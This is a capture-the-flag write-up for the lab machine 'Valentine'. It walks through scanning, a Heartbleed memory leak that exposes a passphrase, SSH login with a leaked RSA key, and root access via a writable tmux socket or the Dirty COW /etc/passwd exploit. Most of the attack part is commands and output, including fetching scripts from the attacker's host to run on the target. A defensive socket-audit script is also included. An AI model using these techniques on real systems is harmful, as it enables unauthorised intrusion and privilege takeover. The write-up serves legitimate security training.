Valentine

From Luniwiki

Valentine01.png


Ports scan

masscan

root@kali:~/HTB/Machines/Valentine# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.79 --rate=1000

Starting masscan 1.0.5 at 2019-11-27 19:03:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.79
Discovered open port 443/tcp on 10.10.10.79
Discovered open port 22/tcp on 10.10.10.79

nmap

root@kali:~/HTB/Machines/Valentine# nmap -A -T4 -v 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-27 14:03 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating Ping Scan at 14:03
Scanning 10.10.10.79 [4 ports]
Completed Ping Scan at 14:03, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:03
Scanning valentine.htb (10.10.10.79) [1000 ports]
Discovered open port 80/tcp on 10.10.10.79
Discovered open port 443/tcp on 10.10.10.79
Discovered open port 22/tcp on 10.10.10.79
Completed SYN Stealth Scan at 14:03, 0.72s elapsed (1000 total ports)
Initiating Service scan at 14:03
Scanning 3 services on valentine.htb (10.10.10.79)
Completed Service scan at 14:03, 12.32s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against valentine.htb (10.10.10.79)
adjust_timeouts2: packet supposedly had rtt of -206422 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -206422 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -206632 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -206632 microseconds.  Ignoring time.
Retrying OS detection (try #2) against valentine.htb (10.10.10.79)
adjust_timeouts2: packet supposedly had rtt of -407787 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -407787 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -832859 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -832859 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -883359 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -883359 microseconds.  Ignoring time.
Initiating Traceroute at 14:03
Completed Traceroute at 14:03, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 14:03
Completed Parallel DNS resolution of 2 hosts. at 14:03, 0.19s elapsed
NSE: Script scanning 10.10.10.79.
Initiating NSE at 14:03
Completed NSE at 14:03, 2.75s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.52s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after:  2019-02-06T00:45:25
| MD5:   a413 c4f0 b145 2154 fb54 b2de c7a9 809d
|_SHA-1: 2303 80da 60e7 bde7 2ba6 76dd 5214 3c3c 6f53 01b1
|_ssl-date: 2019-11-27T19:03:46+00:00; 0s from scanner time.
Aggressive OS guesses: Nokia N9 phone (Linux 2.6.32) (94%), Linux 3.0 (94%), Linux 3.2 (94%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.38 - 3.0 (92%), Linux 2.6.38 (92%), Linux 2.6.38 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.5 (91%), Linux 3.8 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Nov 27 14:02:30 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   44.75 ms 10.10.14.1
2   44.79 ms valentine.htb (10.10.10.79)

NSE: Script Post-scanning.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.06 seconds
           Raw packets sent: 1098 (52.860KB) | Rcvd: 2489 (100.994KB)

Check for vulnerabilities.

root@kali:~/HTB/Machines/Valentine# nmap --script vuln 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-27 14:04 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.047s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
443/tcp open  https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:

Nmap done: 1 IP address (1 host up) scanned in 59.47 seconds

As expected, the target is vulnerable to Heartbleed (CVE-2014-0160); the scan also reports CCS Injection and POODLE on the same OpenSSL build.

Web enumeration

Valentine02.png

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/
<center><img src="omg.jpg"/></center>

The image confirms that this is a Heartbleed case, but gives no further hints.

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/omg.jpg --output omg.jpg
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100  149k  100  149k    0     0   416k      0 --:--:-- --:--:-- --:--:--  416k
root@kali:~/HTB/Machines/Valentine# strings omg.jpg
JFIF
 , #&')*)
-0-(0%()(
...

Dirsearch

Dirsearch gives us useful information.

root@kali:~/HTB/Machines/Valentine# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.79

dirsearch v0.3.8
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-27_14-56-18.log
Target: http://10.10.10.79
[14:56:18] Starting:
[14:56:19] 200 -   38B - /index.php
[14:56:19] 200 -   38B - /index/
[14:56:19] 403 -  285B - /icons/
[14:56:26] 200 -   1KB - /dev/
[14:56:30] 403 -  287B - /cgi-bin/
[14:56:38] 403 -  283B - /doc/
[14:58:49] 200 -  554B - /encode.php
[14:58:49] 200 -  554B - /encode/
[14:58:55] 200 -  552B - /decode.php
[14:58:57] 200 -  552B - /decode/
[15:06:53] 403 -  293B - /server-status/
Task Completed

Encode and decode

Encode and decode pages seem to be simple base64 encoders and decoders.

Valentine03.png

Valentine04.png


Dev folder

Valentine05.png

The notes file:

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/dev/notes.txt
To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

The hype_key file:

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/dev/hype_key --output hype_key
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5383  100  5383    0     0  29415      0 --:--:-- --:--:-- --:--:-- 29415
root@kali:~/HTB/Machines/Valentine# cat hype_key
2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 ...

The hype_key file is hex-encoded (ASCII hex digits), so we reverse it with xxd.

root@kali:~/HTB/Machines/Valentine# xxd -r -p hype_key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46


The decoded file is a passphrase-protected RSA private key (Proc-Type: 4,ENCRYPTED with AES-128-CBC), so a passphrase is still needed to use it. We store the decoded key and restrict its permissions so ssh will accept it.

root@kali:~/HTB/Machines/Valentine# xxd -r -p hype_key > hype_key_clear
root@kali:~/HTB/Machines/Valentine# chmod 600 hype_key_clear

CVE-2014-0160

Search exploit

root@kali:~/HTB/Machines/Valentine# searchsploit heartbleed
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path
                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure ( | exploits/multiple/remote/32764.py
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)       | exploits/multiple/remote/32791.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS | exploits/multiple/remote/32998.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure          | exploits/multiple/remote/32745.py
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

32764.py and 32745.py

The two scripts behave the same way.

root@kali:~/HTB/Machines/Valentine# python 32764.py 10.10.10.79
Trying SSL 3.0...
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0300, length = 94
 ... received message: type = 22, ver = 0300, length = 885
 ... received message: type = 22, ver = 0300, length = 331
 ... received message: type = 22, ver = 0300, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0300, length = 16384
Received heartbeat response:
 0000: 02 40 00 D8 03 00 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
...

Both scripts leak server memory through the oversized heartbeat response. After several attempts we catch something useful: the tail of an HTTP POST to decode.php with a base64 value.

 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 30 2E 30 2E  ....#.......0.0.
 00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
 00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
 0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
 0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
 0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
 0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
 0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
 0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D 00  mV0aGVoeXBlCg==.
 0160: DB 1E DE 15 D9 A1 1A 50 6E 3A 7F D8 0D 7E A3 1E  .......Pn:...~..
 0170: 5D 0F CC 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ]...............
 0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

heartbleed.py

The previous scripts needed several attempts and their output was hard to read. This second script offers more options.

root@kali:~/HTB/Machines/Valentine# mkdir CVE2014-0160
root@kali:~/HTB/Machines/Valentine# cd CVE2014-0160/
root@kali:~/HTB/Machines/Valentine/CVE2014-0160# wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
--2019-11-28 15:33:52--  https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 199.232.32.133
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|199.232.32.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18230 (18K) [text/plain]
Saving to: ‘heartbleed.py’

heartbleed.py 100%[===========================================================================================================>] 17.80K --.-KB/s in 0.02s
2019-11-28 15:33:53 (1.10 MB/s) - ‘heartbleed.py’ saved [18230/18230]

These are the available options:

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# python heartbleed.py

defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

Usage: heartbleed.py server [options]

Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  TCP port to test (default: 443)
  -n NUM, --num=NUM     Number of times to connect/loop (default: 1)
  -s, --starttls        Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...
  -f FILEIN, --filein=FILEIN
                        Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port
  -v, --verbose         Enable verbose output
  -x, --hexdump         Enable hex output
  -r RAWOUTFILE, --rawoutfile=RAWOUTFILE
                        Dump the raw memory contents to a file
  -a ASCIIOUTFILE, --asciioutfile=ASCIIOUTFILE
                        Dump the ascii contents to a file
  -d, --donotdisplay    Do not display returned data on screen
  -e, --extractkey      Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.

We run it several times and dump the raw memory to a file.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# python heartbleed.py -n 100 -d  -r out.raw 10.10.10.79

defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: 10.10.10.79:443, 100 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 100 of 100
##################################################################

After 100 loops, the script has generated 1.6 MB of raw data.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# ls -lh out.raw
-rw-r--r-- 1 root root 1.6M Nov 28 15:44 out.raw

We find the same HTML form leaked from memory. The result is the same as with the previous scripts, but this one is friendlier.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# strings out.raw
0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

Decode the leaked information

We can use the application's own decoder.

Valentine06.png

Valentine07.png

Or, since the encoding is plain base64, simply decode it locally.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype

User Flag

With the RSA key, a password (a candidate for the key's passphrase) and a likely username (hype, from the key file name), we try an SSH login.

root@kali:~/HTB/Machines/Valentine# ssh -i hype_key_clear hype@10.10.10.79
The authenticity of host '10.10.10.79 (10.10.10.79)' can't be established.
ECDSA key fingerprint is SHA256:lqH8pv30qdlekhX8RTgJTq79ljYnL2cXflNTYu8LS5w.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.79' (ECDSA) to the list of known hosts.
Enter passphrase for key 'hype_key_clear':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it.
Last login: Thu Nov 28 13:04:22 2019 from 10.10.14.34
hype@Valentine:~$ cat Desktop/user.txt
<USER_FLAG>

User escalation

Upload Linux Enumeration script

root@kali:~/HTB/Machines/Valentine# cp ../../Utils/LinEnum/LinEnum.sh ./
root@kali:~/HTB/Machines/Valentine# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the target

hype@Valentine:/tmp$ wget -q http://10.10.14.34/LinEnum.sh
hype@Valentine:/tmp$ chmod +x LinEnum.sh
hype@Valentine:/tmp$ ./LinEnum.sh
...

Full Linux Enumeration output

Points of interest from enumeration

# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
[-] Current user's history files:
-rw------- 1 hype hype 164 Nov 28 13:10 /home/hype/.bash_history


[-] Location and contents (if accessible) of .bash_history file(s):
/home/hype/.bash_history
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
ls -l
cat Desktop/user.txt
exit

Escalation

If we check the bash history of the user hype:

hype@Valentine:~$ cat .bash_history
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
ls -l
cat Desktop/user.txt
exit

There is a tmux server running as root on a custom socket path.

hype@Valentine:/tmp$ ps -ef | grep tmux
root       1032      1  0 Nov28 ?        00:00:27 /usr/bin/tmux -S /.devs/dev_sess
hype       8234   7945  0 07:02 pts/1    00:00:00 grep --color=auto tmux
hype@Valentine:/tmp$ ls -l /.devs/dev_sess
srw-rw---- 1 root hype 0 Nov 28 08:57 /.devs/dev_sess

The socket (the leading s in the mode) is owned by root and is readable and writable by group hype, so any process running as hype can attach to the root session.

hype@Valentine:/tmp$ /usr/bin/tmux -S /.devs/dev_sess
root@Valentine:/tmp# whoami
root
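The misconfiguration above is a root-owned Unix socket that a non-root group can write to. The following audit script is an added example, not part of the original write-up: it walks the filesystem and reports every socket owned by uid 0 whose mode grants write access to a non-root group or to everyone. The decision logic works on raw stat fields so it can be exercised with constructed values; the path /.devs/dev_sess and the gid 1000 used in the comments are assumptions.

```python
"""Find root-owned Unix sockets that other users can write to.

Added example (not part of the original write-up). A tmux server running as
root on a group-writable socket lets anyone in that group attach to the root
session, which is exactly the finding above (srw-rw---- root hype /.devs/dev_sess).
"""
import os
import stat
from dataclasses import dataclass
from typing import List, Optional

# Pseudo filesystems that are noisy and never hold user-created sockets.
SKIP_DIRS = ("/proc", "/sys", "/dev")


@dataclass
class SocketFinding:
    path: str
    mode: str    # symbolic mode as ls -l prints it, e.g. srw-rw----
    uid: int
    gid: int
    reason: str


def classify_socket(path: str, st_mode: int, uid: int, gid: int) -> Optional[SocketFinding]:
    """Return a finding if the entry is a root-owned socket that non-root
    users can write to, else None. Pure function over stat fields."""
    if not stat.S_ISSOCK(st_mode) or uid != 0:
        return None
    reasons = []
    # Group write bit only matters when the group is not root's own group.
    if st_mode & stat.S_IWGRP and gid != 0:
        reasons.append(f"writable by group {gid}")
    if st_mode & stat.S_IWOTH:
        reasons.append("world writable")
    if not reasons:
        return None
    return SocketFinding(path, stat.filemode(st_mode), uid, gid, "; ".join(reasons))


def _under_skip_dir(dirpath: str) -> bool:
    return any(dirpath == d or dirpath.startswith(d + "/") for d in SKIP_DIRS)


def scan_sockets(root: str = "/") -> List[SocketFinding]:
    """Walk `root` without following symlinks and collect findings."""
    findings: List[SocketFinding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        if _under_skip_dir(dirpath):
            dirnames[:] = []          # prune the walk below this directory
            continue
        for name in filenames:        # sockets are listed here, not in dirnames
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue              # vanished or unreadable; skip it
            finding = classify_socket(full, st.st_mode, st.st_uid, st.st_gid)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    # Example: the socket from the write-up would be reported as
    # "srw-rw---- uid=0 gid=1000 /.devs/dev_sess (writable by group 1000)"
    # (gid 1000 for hype is an assumption).
    for f in scan_sockets("/"):
        print(f"{f.mode} uid={f.uid} gid={f.gid} {f.path}  ({f.reason})")
```

Run it as root on the target host; the same check is cheap to add to a scheduled hardening job, since the walk skips /proc, /sys and /dev.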

User escalation (CVE-2016-5195)

Alternative way to escalate privileges.

Upload Linux exploit suggester

Check if our HTTP server is up.

root@kali:~/HTB/Machines/Valentine# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.79 - - [29/Nov/2019 08:56:19] "GET /LinEnum.sh HTTP/1.1" 200 -

From the target, fetch the script and run it, saving the output to a file.

hype@Valentine:~$ wget -q http://10.10.14.34/linux-exploit-suggester.sh
hype@Valentine:~$ chmod +x linux-exploit-suggester.sh
hype@Valentine:~$ ./linux-exploit-suggester.sh > les

Retrieve the file

root@kali:~/HTB/Machines/Valentine# scp -i hype_key_clear hype@10.10.10.79:/home/hype/les ./
Enter passphrase for key 'hype_key_clear':
les                                                              100% 7621   161.6KB/s   00:00

Full Linux exploit suggester file

Interesting exploit in the les file:

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

Search exploit

root@kali:~/HTB/Machines/Valentine# searchsploit dirty cow
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                         |  Path
                                                                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                 | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                 | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)     | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)        | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                           | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)     | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                            | exploits/linux/local/40611.c
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

The kernel is below 3.9, so it is in the affected range:

hype@Valentine:/tmp$ uname -a
Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

Exploit:

root@kali:~/HTB/Machines/Valentine# searchsploit -m 40839
 Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
     URL: https://www.exploit-db.com/exploits/40839
    Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /root/HTB/Machines/Valentine/40839.c

Instructions from the file:

root@kali:~/HTB/Machines/Valentine# vi 40839.c
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."

Upload and compile the exploit

hype@Valentine:~$ wget -q http://10.10.14.34/40839.c
hype@Valentine:~$ gcc -pthread 40839.c -o dirty -lcrypt

Run the exploit

hype@Valentine:~$ ./dirty easypassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: easypassword
Complete line:
firefart:fi5FgEvdhZiPQ:0:0:pwned:/root:/bin/bash

mmap: 7f31da7ac000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'easypassword'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Gain access

The firefart line has been written over the first line of /etc/passwd (the original root entry), and the daemon entry below it is left truncated:

hype@Valentine:~$ head /etc/passwd
firefart:fi5FgEvdhZiPQ:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh 
